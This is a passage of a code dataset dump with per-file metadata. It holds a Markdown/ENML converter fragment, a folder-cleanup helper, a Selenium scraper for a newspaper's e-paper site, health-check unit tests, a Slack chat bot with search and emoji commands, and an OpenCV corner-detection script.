node.ENTITY_NODE : return \"ENTITY_NODE\"\n elif node.nodeType == node.PROCESSING_INSTRUCTION_NODE : return \"PROCESSING_INSTRUCTION_NODE\"\n elif node.nodeType == node.COMMENT_NODE : return \"COMMENT_NODE\"\n elif node.nodeType == node.DOCUMENT_NODE : return \"DOCUMENT_NODE\"\n elif node.nodeType == node.DOCUMENT_TYPE_NODE : return \"DOCUMENT_TYPE_NODE\"\n elif node.nodeType == node.NOTATION_NODE : return \"NOTATION_NODE\"\n return \"UKNOWN NODE\"\n#}}}\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n", "sub_path": "plugin/py/markdownAndENML.py", "file_name": "markdownAndENML.py", "file_ext": "py", "file_size_in_byte": 8598, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.compile", "line_number": 37, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 38, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 95, "usage_type": "call"}, {"api_name": "markdown.markdown", "line_number": 170, "usage_type": "call"}, {"api_name": "HTMLParser.HTMLParser", "line_number": 193, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 197, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 198, "usage_type": "call"}, {"api_name": "doctest.testmod", "line_number": 227, "usage_type": "call"}]} +{"seq_id": "520604304", "text": "import os\nfrom pathlib import Path\n\n\ndef empty_folders_before_run():\n \"\"\" \n Empty folders and create folders for the subtitles and audio files if it does not exist.\n \"\"\"\n\n folder_subtitles = Path('data/output/subtitles')\n\n # Create a folder if it does not exist.\n create_folder(folder_subtitles)\n\n for the_file in os.listdir(folder_subtitles):\n file_path = os.path.join(folder_subtitles, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n \n folder_audio = Path('data/output/audio')\n create_folder(folder_audio)\n\n for the_file in os.listdir(folder_audio):\n file_path = os.path.join(folder_audio, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n\ndef create_folder(directory):\n \"\"\" \n Creates a folder.\n \"\"\"\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory. ' + directory) \n ", "sub_path": "library/preparetion/empty_folders.py", "file_name": "empty_folders.py", "file_ext": "py", "file_size_in_byte": 1140, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 19, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 23, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "515657501", "text": "# import libraries\n\nimport urllib2\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport time\nimport traceback\nimport json\nimport re\n\n# specify the url\npaperPage = \"https://www.jagran.com\"\nhdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n\nreq = urllib2.Request(paperPage, headers=hdr)\npage = urllib2.urlopen(req)\n\n# parse the html using beautiful soup and store in variable `soup`\nsoup = BeautifulSoup(page, \"html.parser\")\n# Take out the
    of name and get its value\npaperLink = soup.find('a', text=\"Epaper\")\nepaperLink = paperLink.get('href')\n\nreq = urllib2.Request(epaperLink, headers=hdr)\npage = urllib2.urlopen(req)\n\n# parse the html using beautiful soup and store in variable `soup`\nsoup = BeautifulSoup(page, \"html.parser\")\n\nstateNameList = []\nsuperCityState = [[]]\ncitiesFromSupercity = {}\npaperLink = soup.find('ul', id=\"navbar\").find_all(recursive=False)\nfor name in paperLink:\n findStateName = name.find('a', href=\"#\")\n if findStateName is not None:\n stateName = findStateName.text.strip(\";\")\n stateNameList.append(stateName)\n\n\n\n#capa = DesiredCapabilities.CHROME\n#capa[\"pageLoadStrategy\"] = \"none\"\ndriver = webdriver.Chrome()\nwait = WebDriverWait(driver, 10)\ndriver.get(\"http://epaper.jagran.com/homepage.aspx\")\ndataEpaper = {}\ndataEpaper['state'] = []\nfor stateVar in stateNameList:\n # select first state\n print(\"+++++++++++++++++++++++++\")\n print(stateVar)\n print(\"@@@@@@@@@@@@@@@@@@@@@@@@@@@\")\n #if (stateVar==\"Delhi\") | (stateVar==\"UP\") | (stateVar==\"Haryana\") | (stateVar==\"Uttarakhand\") | (stateVar==\"Bihar\") :\n #continue\n epaperLinkList = []\n dataEpaper['state'].append({\n 'name':stateVar,\n 'city':epaperLinkList\n })\n stateWebElement = driver.find_element_by_xpath('//ul[@id=\"navbar\"]//a[text()=\"%s\" and @href=\"#\"]' %stateVar)\n hoverOverOnState = ActionChains(driver).move_to_element(stateWebElement).perform()\n superCityWebElement = stateWebElement.find_elements_by_xpath('./..//section/ul/li/a[@href=\"#\" or text()=\"%s\"]' %stateVar)\n\n print(len(superCityWebElement))\n superCityList = []\n for superCityWeb in superCityWebElement:\n print(superCityWeb)\n superCityList.append(superCityWeb.text)\n print(superCityWeb.text)\n print(\"-----------\")\n for superCity in superCityList:\n #if (superCity == \"Dhanbad\") | (superCity == \"Jamshedpur\") : #| (superCity == \"Allahabad\") | (superCity == \"Bareilly\") | (superCity == \"Gorakhpur\") | (superCity == \"Kanpur\") | (superCity == \"Jhansi\") :\n #continue\n stateWebElementFirst = driver.find_element_by_xpath(\n '//ul[@id=\"navbar\"]//a[text()=\"%s\" and @href=\"#\"]' % stateVar)\n superCityWebElementFirst = stateWebElementFirst.find_element_by_xpath(\n './..//section/ul/li/a[text()=\"%s\"]' %superCity)\n hoverOverOnStateFirst = ActionChains(driver).move_to_element(stateWebElementFirst)\n hoverOverOnSuperCityFirst = hoverOverOnStateFirst.move_to_element(superCityWebElementFirst)\n hoverOverOnSuperCityFirst.perform()\n\n superCityName = superCity\n print(\"#################\")\n print(superCity)\n print(\"#################\")\n citiWebElement = superCityWebElementFirst.find_elements_by_xpath('./../ul//li')\n cityList = []\n for cityWeb in citiWebElement:\n cityList.append(cityWeb.text)\n print(cityWeb.text)\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n\n for city in cityList:\n cityObject = {}\n cityCode = \"\"\n staleElement = True\n while (staleElement):\n try:\n wait.until(EC.visibility_of_element_located((By.ID, 'navbar')))\n #driver.execute_script(\"window.stop();\")\n stateWebElementAgain = driver.find_element_by_xpath(\n '//ul[@id=\"navbar\"]//a[text()=\"%s\" and @href=\"#\"]' % stateVar)\n superCityWebElementAgain = stateWebElementAgain.find_element_by_xpath(\n './..//section/ul/li/a[text()=\"%s\"]' % superCityName)\n hoverOverOnStateAgain = ActionChains(driver).move_to_element(stateWebElementAgain)\n hoverOverOnSuperCityAgain = hoverOverOnStateAgain.move_to_element(superCityWebElementAgain)\n hoverOverOnSuperCityAgain.perform()\n #cityName = city.text\n print(\"#################\")\n print(city)\n print(\"#################\")\n cityXPath = superCityWebElementAgain.find_element_by_xpath(\n './..//li/a[text()=\"%s\"]' % city)\n #myxpath = ('//li/a[text()=\"%s\"]' % city)\n #element = wait.until(\n #EC.element_to_be_clickable((By.XPATH, cityXPath)))\n #time.sleep(1)\n cityXPath.click()\n #time.sleep(1)\n wait.until(EC.visibility_of_element_located((By.ID, 'navbar')))\n print(\"&&&&&&&&&&&&&&&&&&&&&&found &&&&&&&&&&&&&&&&&&&&&&&&&&&\")\n driver.execute_script(\"window.stop();\")\n elementPdfLink = wait.until(\n EC.element_to_be_clickable((By.XPATH, '//a[@href=\"#\" and @class=\"pdf\"]')))\n driver.find_element_by_xpath('//a[@href=\"#\" and @class=\"pdf\"]').send_keys(Keys.ESCAPE)#findElement((By.XPATH, '//a[@href=\"#\" and @class=\"pdf\"]')).sendKeys(\"Keys.ESCAPE\");\n elementPdfLink.click()\n #time.sleep(1)\n windowTab = driver.window_handles\n for tab in windowTab:\n if tab != windowTab[0]:\n driver.switch_to.window(tab)\n codeUrl = driver.current_url\n print(codeUrl)\n matchObj = re.match(r'http://epaper.jagran.com/epaperimages/\\d+/.+/\\d\\d(.+)-pg.+', codeUrl, re.M | re.I)\n cityCode = matchObj.group(1)\n driver.close()\n cityObject[city] = cityCode\n epaperLinkList.append(cityObject)\n driver.switch_to.window(windowTab[0])\n print(\"coming till here\")\n json_data = json.dumps(dataEpaper)\n print(json_data)\n staleElement = False\n except Exception as e:\n print(\"it is stale\")\n print(e)\n cityObject[city] = \"NOT Found\"\n for window in driver.window_handles:\n driver.switch_to.window(window)\n try:\n driver.switch_to.alert.accept()\n except NoAlertPresentException:\n pass\n windowTab = driver.window_handles\n for tab in windowTab:\n if tab != windowTab[0]:\n driver.switch_to.window(tab)\n codeUrl = driver.current_url\n print(codeUrl)\n driver.close()\n driver.switch_to.window(windowTab[0])\n traceback.print_exc()\n staleElement = False\n\n\n\nassert \"No results found.\" not in driver.page_source\ndriver.close()\n\njson_data = json.dumps(dataEpaper)\nprint(json_data)\n\n\n", "sub_path": "scrapy.py", "file_name": "scrapy.py", "file_ext": "py", "file_size_in_byte": 8314, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "urllib2.Request", "line_number": 27, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 28, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 31, "usage_type": "call"}, {"api_name": "urllib2.Request", "line_number": 36, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 37, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 56, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 56, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 57, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 74, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 91, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 112, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 112, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 112, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 112, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 118, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 133, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 133, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 133, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 133, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 137, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 137, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 137, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 137, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ESCAPE", "line_number": 138, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 138, "usage_type": "name"}, {"api_name": "re.match", "line_number": 147, "usage_type": "call"}, {"api_name": "re.M", "line_number": 147, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 147, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 154, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.NoAlertPresentException", "line_number": 165, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 175, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 183, "usage_type": "call"}]} +{"seq_id": "234185324", "text": "import logging\nfrom datetime import datetime, timedelta\nfrom time import mktime\n\nimport pytest\n\nfrom healthysnake import exceptions, levels\nfrom healthysnake.healthcheck import HealthCheck\n\n\ndef success_check():\n return True\n\n\ndef fail_check():\n return False\n\n\ndef exception_check():\n raise Exception('bang')\n\n\nclass TestHealthCheck(object):\n def test_init(self):\n logger = logging.getLogger(__name__)\n hc = HealthCheck('app', logger=logger)\n assert hc.name == 'app'\n assert hc._logger is not None\n\n def test_add_dependency(self):\n hc = HealthCheck('app')\n hc.add_dependency('dependency', success_check, interval=timedelta(seconds=60), level=levels.SOFT)\n assert hc._services['dependency'] is not None\n assert hc._services['dependency']._interval == timedelta(seconds=60)\n assert hc._services['dependency'].level == levels.SOFT\n\n with pytest.raises(exceptions.DependencyAlreadyPresentException):\n hc.add_dependency('dependency', success_check, interval=timedelta(seconds=60), level=levels.SOFT)\n\n def test_check_dependency(self):\n hc = HealthCheck('app')\n with pytest.raises(exceptions.DependencyNotPresentException):\n hc.check_dependency('dependency')\n hc.add_dependency('dependency', success_check)\n assert hc.check_dependency('dependency') == (True, '')\n\n def test_status_success(self):\n hc = HealthCheck('app')\n hc.add_dependency('dependency1', success_check)\n status = hc.status()\n assert status['name'] == 'app'\n assert status['healthy'] is True\n dep = status['dependencies'][0]\n assert dep['name'] == 'dependency1'\n assert dep['healthy'] is True\n assert dep['level'] is levels.HARD\n last_updated = dep['last_updated']\n assert last_updated <= mktime(datetime.utcnow().timetuple())\n assert dep['next_update'] == last_updated + 10\n\n def test_status_success_soft_failing(self):\n hc = HealthCheck('app')\n hc.add_dependency('dependency1', success_check)\n hc.add_dependency('dependency2', fail_check, level=levels.SOFT)\n status = hc.status()\n assert status['healthy'] is True\n soft_dep = next(dep for dep in status['dependencies'] if dep['level'] == levels.SOFT)\n assert soft_dep['healthy'] is False\n\n def test_status_unhealthy_hard_failing(self):\n hc = HealthCheck('app')\n hc.add_dependency('dependency1', success_check)\n hc.add_dependency('dependency2', fail_check)\n status = hc.status()\n assert status['healthy'] is False\n\n def test_status_raise_exception_counts_as_fail(self):\n logging.disable(logging.CRITICAL)\n hc = HealthCheck('app')\n hc.add_dependency('dependency1', success_check)\n hc.add_dependency('dependency2', exception_check)\n hc._services['dependency2'].last_updated = hc._services['dependency2'].last_updated - timedelta(seconds=60)\n status = hc.status()\n assert status['healthy'] is False\n", "sub_path": "healthysnake/tests/test_healthcheck.py", "file_name": "test_healthcheck.py", "file_ext": "py", "file_size_in_byte": 3074, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 26, "usage_type": "call"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 32, "usage_type": "call"}, {"api_name": "healthysnake.levels.SOFT", "line_number": 32, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 34, "usage_type": "call"}, {"api_name": "healthysnake.levels.SOFT", "line_number": 35, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 35, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 37, "usage_type": "call"}, {"api_name": "healthysnake.exceptions.DependencyAlreadyPresentException", "line_number": 37, "usage_type": "attribute"}, {"api_name": "healthysnake.exceptions", "line_number": 37, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 38, "usage_type": "call"}, {"api_name": "healthysnake.levels.SOFT", "line_number": 38, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 38, "usage_type": "name"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 41, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 42, "usage_type": "call"}, {"api_name": "healthysnake.exceptions.DependencyNotPresentException", "line_number": 42, "usage_type": "attribute"}, {"api_name": "healthysnake.exceptions", "line_number": 42, "usage_type": "name"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 48, "usage_type": "call"}, {"api_name": "healthysnake.levels.HARD", "line_number": 56, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 56, "usage_type": "name"}, {"api_name": "time.mktime", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "name"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 62, "usage_type": "call"}, {"api_name": "healthysnake.levels.SOFT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 64, "usage_type": "name"}, {"api_name": "healthysnake.levels.SOFT", "line_number": 67, "usage_type": "attribute"}, {"api_name": "healthysnake.levels", "line_number": 67, "usage_type": "name"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 71, "usage_type": "call"}, {"api_name": "logging.disable", "line_number": 78, "usage_type": "call"}, {"api_name": "logging.CRITICAL", "line_number": 78, "usage_type": "attribute"}, {"api_name": "healthysnake.healthcheck.HealthCheck", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "151617003", "text": "import json\nimport random\nimport re\nimport requests\nfrom sys import stderr\nfrom itertools import islice\n\nimport praw\nfrom credentials import *\nfrom datetime import datetime, timedelta\nfrom flask import Flask, request, make_response, render_template\nfrom slackclient import SlackClient\n\nsc = SlackClient(oauth_token_bot)\nuser = SlackClient(oauth_token_user)\nreddit = praw.Reddit(client_id=reddit_client_id, \n client_secret=reddit_client_secret,\n user_agent='Slackchop')\n\n# this is an infinite random bit generator. shitty but it works\nrandbits = iter(lambda: random.getrandbits(1), 2)\ndef randstream(i):\n return iter(lambda: random.randrange(i), i)\n\ndef p(*args, **kwargs):\n print(*args, **kwargs, file = stderr)\n\nyoutube_url = 'https://www.youtube.com'\nyoutube_vid_regex = '/watch\\?v=[^\"]+'\ngoogle_search_base = 'https://www.google.com/search'\nfake_mobile_agent = '''Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Versio n/4.0.5 Mobile/8A293 Safari/6531.22.7'''\nshake = {'?': 'question',\n '.': 'period',\n '~': 'tilde',\n '+': 'plus',\n '-': 'minus',\n '/': 'slash',\n '=': 'equals',\n ',': 'comma',\n '!': 'exclamation',\n '#': 'octothorpe',\n '$': 'dollar',\n '*': 'asterisk'}\n\n\n\napplication = Flask(__name__)\n\ndef get_emojis(init=False, add=None, rmeove=None):\n # currently can't get this from an online list because slack doesn't return\n # a list of default emoji they support and provide no way of checking if\n # they support a particular emoji either\n emojis = open('emoji_names.txt').read().splitlines()\n # add all current emojis\n emojis += list(user.api_call('emoji.list')['emoji'].keys())\n return emojis\n\nemojis = get_emojis()\n\ndef truncate_message(message):\n message = message[:4000]\n if message.endswith('::'):\n message = message[:-1]\n elif not message.endswith(':'):\n message = message.rsplit(':', 1)[0]\n return message\n\ndef send_message(*args, **kwargs):\n sc.api_call('chat.postMessage', *args, **kwargs)\n\ndef handle_message(slack_event, message):\n channel = slack_event['event']['channel']\n match = re.match(r'!youtube\\s+(.+)', message)\n if match:\n res = requests.get(youtube_url + '/results',\n params={'search_query':match[1]})\n vids = re.findall(youtube_vid_regex, res.text)\n send_message(channel=channel, text=youtube_url+vids[0])\n return\n\n match = re.match(r'!(gif|image)\\s+(.+)', message)\n if match:\n t, q = match[1], match[2]\n #TODO: Normalize messages before passing them to modules\n q = re.sub(r'<[^\\|]*\\|([^>]+)>', r'\\1', q)\n params = {'tbm':'isch', 'q':q, 'safe':''}\n if t == 'gif': params['tbs'] = 'itp:animated'\n response = requests.get(google_search_base,\n params=params, headers={\"User-agent\": fake_mobile_agent})\n links = re.findall(r'imgurl\\\\x3d([^\\\\]+)\\\\', response.text)\n send_message(channel=channel, text=random.choice(links),\n unfurl_links=True, unfurl_media=True)\n\n match = re.match(r'!roll\\s+(\\d*|an?)\\s*[dD]\\s*(\\d+)', message)\n if match:\n n, d = match[1], match[2]\n n = 1 if 'a' in n else int(n)\n d = int(d)\n reply = ', '.join([str(random.randrange(d)+1) for i in range(n)])\n send_message(channel=channel, text=reply);\n return\n if message.rstrip() == '!flip':\n reply = 'heads' if random.getrandbits(1) else 'tails'\n send_message(channel=channel, text=reply);\n return\n match = re.match(r'!(?:shuffle|flip)\\s+(.+)', message)\n if match:\n items = list(map(lambda x:x.strip(), match[1].split(',')))\n random.shuffle(items)\n reply = ', '.join(items)\n send_message(channel=channel, text=reply);\n return\n\n match = re.match(r'!emoji\\s+(\\d+)\\s*', message)\n if match:\n num = int(match[1])\n if num == 0: return\n reply = ':{}:'.format('::'.join(random.choices(emojis, k=num)))\n send_message(channel=channel, text=truncate_message(reply))\n return\n match = re.match(r'!emoji\\s+(:[^:]+:)(?:[\\*xX\\s])?(\\d+)', message)\n if match and int(match[2]) > 0 and match[1][1:-1] in emojis:\n send_message(channel=channel, text=truncate_message(match[1]*int(match[2])))\n return\n match = re.match(r'!emoji\\s+(\\S+)\\s*', message)\n if match:\n es = [x for x in emojis if re.search(match[1], x)]\n if len(es) == 0: return\n reply = ':{}:'.format('::'.join(es))\n send_message(channel=channel, text=truncate_message(reply))\n return\n\n match = re.match(r'!shake\\s+(\\S.*)', message)\n if match:\n pattern = 'shake_{}'\n words = []\n for word in match[1].split():\n parts = []\n for letter in word.lower():\n if letter.isalnum():\n parts.append(pattern.format(letter))\n elif letter in shake:\n parts.append(pattern.format(shake[letter]))\n words.append(':' + '::'.join(parts) + ':')\n reply = ':space:'.join(words)\n send_message(channel=channel, text=truncate_message(reply))\n return\n\n if message.startswith('!emojify'):\n words = message.split(' ')[1:]\n pattern = ':{}:'\n if words[0].startswith('`') and words[0].endswith('`'):\n pattern = words[0][1:-1]\n words = words[1:]\n if len(words) == 1:\n words = words[0]\n ems = list(map(lambda x: pattern.format(x), words))\n send_message(channel=channel, text=''.join(ems))\n return\n\n take = lambda x: not x.stickied and not x.is_self\n match = re.match(r'!randfeld\\s+(.*)', message)\n if match:\n sub = choose(filter(take,\n reddit.subreddit('seinfeldgifs').search(match[1]+' self:no')), 50)\n send_message(channel=channel, text=sub.url,\n unfurl_links=True, unfurl_media=True, icon_emoji=':jerry:')\n return\n if message.startswith('!randfeld'):\n sub = choose(filter(take,\n reddit.subreddit('seinfeldgifs').hot(limit=50)))\n send_message(channel=channel, text=sub.url,\n unfurl_links=True, unfurl_media=True, icon_emoji=':jerry:')\n return\n\n if message.startswith('!gridtext '):\n text = message.split(' ', 1)[1]\n if len(text) > 80: text = text[:80]\n res = []\n n = len(text)\n for i in range(n):\n res.append(' '.join(text))\n text = text[-1] + text[:-1]\n reply = '```{}```'.format('\\n'.join(res))\n send_message(channel=channel, text=reply)\n return\n\ndef choose(seq, limit=None):\n if limit: seq = islice(seq, limit)\n ret = None\n for item, take in zip(seq, randstream(5)):\n if not ret: ret = item\n if not take: return item\n return ret\n\ndef event_handler(slack_event):\n event = slack_event['event']\n event_type = event['type']\n if event_type == 'reaction_added':\n user_id = event['user']\n elif event_type == 'message' and 'text' in event:\n handle_message(slack_event, event['text'])\n elif event_type == 'emoji_changed':\n global emojis\n if event['subtype'] == 'add':\n emojis.append(event['name'])\n elif event['subtype'] == 'remove':\n for name in event['names']:\n emojis.remove(name)\n else:\n p(slack_event)\n return make_response(\"Ok\", 200, )\n\n@application.route(\"/events\", methods=[\"GET\", \"POST\"])\ndef hears():\n slack_event = json.loads(request.data)\n p(slack_event)\n if \"challenge\" in slack_event:\n return make_response(slack_event[\"challenge\"],\n 200, {\"content_type\": \"application/json\"})\n return event_handler(slack_event)\n\n@application.route(\"/begin_auth\", methods=[\"GET\"])\ndef pre_install():\n return '''\n \n Add to Slack\n \n '''.format(oauth_scope, client_id)\n\n@application.route(\"/finish_auth\", methods=[\"GET\", \"POST\"])\ndef post_install():\n auth_code = request.args['code']\n sc = SlackClient(\"\")\n auth_response = sc.api_call(\n \"oauth.access\",\n client_id=client_id,\n client_secret=client_secret,\n code=auth_code\n )\n user_token = auth_response['access_token']\n bot_token = auth_response['bot']['bot_access_token']\n return \"Auth complete\"\n\n@application.route(\"/\")\ndef go_away():\n return 'Go Away'\n\nif __name__ == '__main__':\n application.run(debug=True)\n", "sub_path": "application.py", "file_name": "application.py", "file_ext": "py", "file_size_in_byte": 8626, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "slackclient.SlackClient", "line_number": 14, "usage_type": "call"}, {"api_name": "slackclient.SlackClient", "line_number": 15, "usage_type": "call"}, {"api_name": "praw.Reddit", "line_number": 16, "usage_type": "call"}, {"api_name": "random.getrandbits", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 47, "usage_type": "call"}, {"api_name": "re.match", "line_number": 73, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 75, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 77, "usage_type": "call"}, {"api_name": "re.match", "line_number": 81, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 85, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 88, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 90, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 91, "usage_type": "call"}, {"api_name": "re.match", "line_number": 94, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 99, "usage_type": "call"}, {"api_name": "random.getrandbits", "line_number": 103, "usage_type": "call"}, {"api_name": "re.match", "line_number": 106, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 109, "usage_type": "call"}, {"api_name": "re.match", "line_number": 114, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 118, "usage_type": "call"}, {"api_name": "re.match", "line_number": 121, "usage_type": "call"}, {"api_name": "re.match", "line_number": 125, "usage_type": "call"}, {"api_name": "re.search", "line_number": 127, "usage_type": "call"}, {"api_name": "re.match", "line_number": 133, "usage_type": "call"}, {"api_name": "re.match", "line_number": 162, "usage_type": "call"}, {"api_name": "itertools.islice", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 212, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 216, "usage_type": "call"}, {"api_name": "flask.request.data", "line_number": 216, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 216, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 233, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 233, "usage_type": "name"}, {"api_name": "slackclient.SlackClient", "line_number": 234, "usage_type": "call"}]} +{"seq_id": "538127437", "text": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimg = cv2.imread('img_07473.jpg')\n\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n#gray = np.float32(gray)\n\ncorners = cv2.goodFeaturesToTrack(gray,25,0.01,10)\ncorners = np.int0(corners)\n\nfor i in corners:\n x,y = i.ravel()\n cv2.circle(img,(x,y),3,255,-1)\n\nplt.imshow(img)\nplt.savefig(\"corners.png\")\n", "sub_path": "scripts/corners/corners.py", "file_name": "corners.py", "file_ext": "py", "file_size_in_byte": 364, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "cv2.imread", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.goodFeaturesToTrack", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.int0", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": 